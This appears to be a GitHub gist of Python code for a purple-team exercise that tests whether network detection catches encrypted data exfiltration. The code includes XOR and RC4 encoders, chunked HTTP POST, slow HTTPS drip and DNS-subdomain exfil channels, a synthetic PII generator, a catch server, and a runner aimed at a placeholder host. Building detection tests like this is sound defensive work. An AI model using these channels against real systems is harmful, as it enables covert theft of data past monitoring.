Skip to content

Instantly share code, notes, and snippets.

@derekxmartin
Created March 9, 2026 15:42
Show Gist options
  • Select an option

  • Save derekxmartin/b6d58611b3b0cc54724a8bfc19bfb321 to your computer and use it in GitHub Desktop.

Select an option

Save derekxmartin/b6d58611b3b0cc54724a8bfc19bfb321 to your computer and use it in GitHub Desktop.
xor/rc4
"""
encoders.py
XOR (single-byte, rolling) and RC4 encoding implementations.
These are intentionally simple — mirrors real-world malware tradecraft.
"""
def xor_single_byte(data: bytes, key: int = 0x41) -> bytes:
"""Single-byte XOR. Trivial but still common in commodity malware."""
return bytes(b ^ key for b in data)
def xor_rolling(data: bytes, key: bytes = b"purpleteam") -> bytes:
"""Rolling/multi-byte XOR. Used by Cobalt Strike, many RATs."""
key_len = len(key)
return bytes(b ^ key[i % key_len] for i, b in enumerate(data))
def rc4_encrypt(data: bytes, key: bytes = b"vectra-test-key-2026") -> bytes:
"""
RC4 stream cipher (KSA + PRGA).
Still used by: Cobalt Strike (malleable C2), TrickBot, QakBot,
many implant families for C2 channel encryption.
"""
# Key Scheduling Algorithm (KSA)
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
# Pseudo-Random Generation Algorithm (PRGA)
i = j = 0
output = bytearray()
for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) % 256]
output.append(byte ^ k)
return bytes(output)
"""
exfil_channels.py
Multiple exfil methods to test different Vectra detection models.
All channels log what they send for post-test validation.
"""
import requests
import time
import base64
import logging
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
log = logging.getLogger("exfil")
def exfil_http_post(data: bytes, url: str, chunk_size: int = 1024 * 512) -> None:
"""
Bulk HTTP POST — should trigger Data Smuggler on large volumes.
Sends in chunks to simulate realistic transfer patterns.
"""
total = len(data)
sent = 0
for i in range(0, total, chunk_size):
chunk = data[i:i + chunk_size]
resp = requests.post(
url,
data=chunk,
headers={"Content-Type": "application/octet-stream"},
timeout=30,
)
sent += len(chunk)
log.info(f"POST chunk {i // chunk_size + 1} | {sent}/{total} bytes | HTTP {resp.status_code}")
log.info(f"[+] Exfil complete: {sent} bytes via HTTP POST")
def exfil_https_drip(data: bytes, url: str, chunk_size: int = 4096, delay: float = 5.0) -> None:
"""
Low-and-slow HTTPS exfil — small chunks over extended period.
Targets Hidden HTTPS Tunnel detection (long session, unusual cadence).
"""
total = len(data)
sent = 0
for i in range(0, total, chunk_size):
chunk = data[i:i + chunk_size]
resp = requests.post(
url,
data=chunk,
headers={"Content-Type": "application/octet-stream"},
timeout=30,
verify=True, # Use TLS — we want Vectra to see encrypted traffic
)
sent += len(chunk)
log.info(f"DRIP chunk {i // chunk_size + 1} | {sent}/{total} bytes | sleeping {delay}s")
time.sleep(delay)
log.info(f"[+] Drip exfil complete: {sent} bytes over ~{(total / chunk_size) * delay:.0f}s")
def exfil_dns_txt(data: bytes, domain: str, chunk_size: int = 200) -> None:
"""
DNS-based exfil — base64 encodes chunks as subdomain labels.
Requires a DNS listener on the authoritative NS for the test domain.
Target: DNS Tunnel detection model.
NOTE: This is a stub — full implementation needs dnspython or
raw socket queries. Included for completeness of the test matrix.
"""
import dns.resolver # pip install dnspython
total = len(data)
sent = 0
for i in range(0, total, chunk_size):
chunk = data[i:i + chunk_size]
encoded = base64.b32encode(chunk).decode().rstrip("=").lower()
# Split into DNS-safe labels (max 63 chars each)
labels = [encoded[j:j + 63] for j in range(0, len(encoded), 63)]
subdomain = ".".join(labels)
query = f"{subdomain}.{domain}"
try:
dns.resolver.resolve(query, "TXT")
except Exception:
pass # Expected — we don't need a real answer
sent += len(chunk)
log.info(f"DNS chunk {i // chunk_size + 1} | {sent}/{total} bytes")
log.info(f"[+] DNS exfil complete: {sent} bytes")
"""
generate_dummy_data.py
Produces synthetic PII dataset for exfil testing.
Never use real data.
"""
import json
import os
from faker import Faker
fake = Faker()
def generate_dataset(num_records: int = 10_000, output_path: str = "dummy_pii.json") -> str:
records = []
for _ in range(num_records):
records.append({
"name": fake.name(),
"ssn": fake.ssn(),
"email": fake.email(),
"address": fake.address(),
"phone": fake.phone_number(),
"cc_number": fake.credit_card_number(),
"dob": fake.date_of_birth(minimum_age=18, maximum_age=90).isoformat(),
})
with open(output_path, "w") as f:
json.dump(records, f)
size_mb = os.path.getsize(output_path) / (1024 * 1024)
print(f"[+] Generated {num_records} records ({size_mb:.2f} MB) -> {output_path}")
return output_path
if __name__ == "__main__":
generate_dataset()
"""
listener.py
Minimal Flask catch server. Deploy on the controlled external endpoint.
Logs everything received for post-test comparison.
Usage:
pip install flask
python listener.py --port 443 --tls --cert cert.pem --key key.pem
"""
from flask import Flask, request
import argparse
import os
import time
import hashlib
app = Flask(__name__)
LOG_DIR = "received"
@app.route("/upload", methods=["POST"])
def receive():
data = request.get_data()
ts = time.strftime("%Y%m%d_%H%M%S")
sha256 = hashlib.sha256(data).hexdigest()[:16]
filename = f"{LOG_DIR}/{ts}_{sha256}.bin"
os.makedirs(LOG_DIR, exist_ok=True)
with open(filename, "wb") as f:
f.write(data)
print(f"[+] Received {len(data)} bytes -> {filename}")
return "OK", 200
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--port", type=int, default=8443)
parser.add_argument("--tls", action="store_true")
parser.add_argument("--cert", default="cert.pem")
parser.add_argument("--key", default="key.pem")
args = parser.parse_args()
ssl_ctx = None
if args.tls:
ssl_ctx = (args.cert, args.key)
app.run(host="0.0.0.0", port=args.port, ssl_context=ssl_ctx)
"""
run_test.py
Orchestrates the full test matrix. Run from the test host.
Usage:
python run_test.py --target https://exfil-listener.example.com/upload \
--dns-domain exfil.test.example.com \
--data-file dummy_pii.json \
--test all
"""
import argparse
import json
import sys
import time
from pathlib import Path
from encoders import xor_single_byte, xor_rolling, rc4_encrypt
from exfil_channels import exfil_http_post, exfil_https_drip, exfil_dns_txt
from generate_dummy_data import generate_dataset
TESTS = {
"xor_single_http": {
"description": "Single-byte XOR over HTTP POST (bulk)",
"encoder": lambda d: xor_single_byte(d, key=0x41),
"channel": "http_post",
"mitre": "T1027 + T1048.003",
},
"xor_rolling_https": {
"description": "Rolling XOR over HTTPS POST (bulk)",
"encoder": lambda d: xor_rolling(d, key=b"purpleteam"),
"channel": "https_post",
"mitre": "T1027 + T1573.001",
},
"rc4_https": {
"description": "RC4 over HTTPS POST (bulk)",
"encoder": lambda d: rc4_encrypt(d, key=b"vectra-test-key-2026"),
"channel": "https_post",
"mitre": "T1027 + T1573.001",
},
"rc4_https_drip": {
"description": "RC4 over HTTPS (low-and-slow drip)",
"encoder": lambda d: rc4_encrypt(d, key=b"vectra-test-key-2026"),
"channel": "https_drip",
"mitre": "T1027 + T1573.001",
},
"xor_dns": {
"description": "XOR over DNS TXT record queries",
"encoder": lambda d: xor_single_byte(d, key=0x41),
"channel": "dns",
"mitre": "T1027 + T1048.001",
},
}
def load_data(path: str) -> bytes:
return Path(path).read_bytes()
def run_test(test_name: str, data: bytes, target: str, dns_domain: str) -> dict:
test = TESTS[test_name]
print(f"\n{'='*60}")
print(f"TEST: {test_name}")
print(f"DESC: {test['description']}")
print(f"ATT&CK: {test['mitre']}")
print(f"{'='*60}")
# Encode
start = time.time()
encoded = test["encoder"](data)
encode_time = time.time() - start
print(f"[+] Encoded {len(data)} -> {len(encoded)} bytes in {encode_time:.2f}s")
# Exfiltrate
exfil_start = time.time()
if test["channel"] == "http_post":
exfil_http_post(encoded, target.replace("https://", "http://"))
elif test["channel"] == "https_post":
exfil_http_post(encoded, target)
elif test["channel"] == "https_drip":
exfil_https_drip(encoded, target, chunk_size=4096, delay=5.0)
elif test["channel"] == "dns":
exfil_dns_txt(encoded, dns_domain)
exfil_time = time.time() - exfil_start
result = {
"test": test_name,
"description": test["description"],
"mitre": test["mitre"],
"data_size_bytes": len(data),
"encoded_size_bytes": len(encoded),
"encode_time_s": round(encode_time, 2),
"exfil_time_s": round(exfil_time, 2),
"timestamp": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
}
print(f"[+] Complete in {exfil_time:.2f}s")
return result
def main():
parser = argparse.ArgumentParser(description="RC4/XOR Exfil Test Runner")
parser.add_argument("--target", required=True, help="Exfil listener URL")
parser.add_argument("--dns-domain", default="exfil.test.example.com", help="DNS exfil domain")
parser.add_argument("--data-file", default="dummy_pii.json", help="Path to test data")
parser.add_argument("--test", default="all", help="Test name or 'all'")
parser.add_argument("--generate", action="store_true", help="Generate dummy data first")
parser.add_argument("--records", type=int, default=10_000, help="Records to generate")
args = parser.parse_args()
if args.generate:
generate_dataset(num_records=args.records, output_path=args.data_file)
data = load_data(args.data_file)
print(f"[*] Loaded {len(data)} bytes from {args.data_file}")
tests_to_run = list(TESTS.keys()) if args.test == "all" else [args.test]
results = []
for test_name in tests_to_run:
if test_name not in TESTS:
print(f"[-] Unknown test: {test_name}", file=sys.stderr)
continue
result = run_test(test_name, data, args.target, args.dns_domain)
results.append(result)
print(f"[*] Pausing 60s between tests for Vectra to process...\n")
time.sleep(60)
# Write results log
results_file = f"test_results_{time.strftime('%Y%m%d_%H%M%S')}.json"
with open(results_file, "w") as f:
json.dump(results, f, indent=2)
print(f"\n[+] Results written to {results_file}")
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment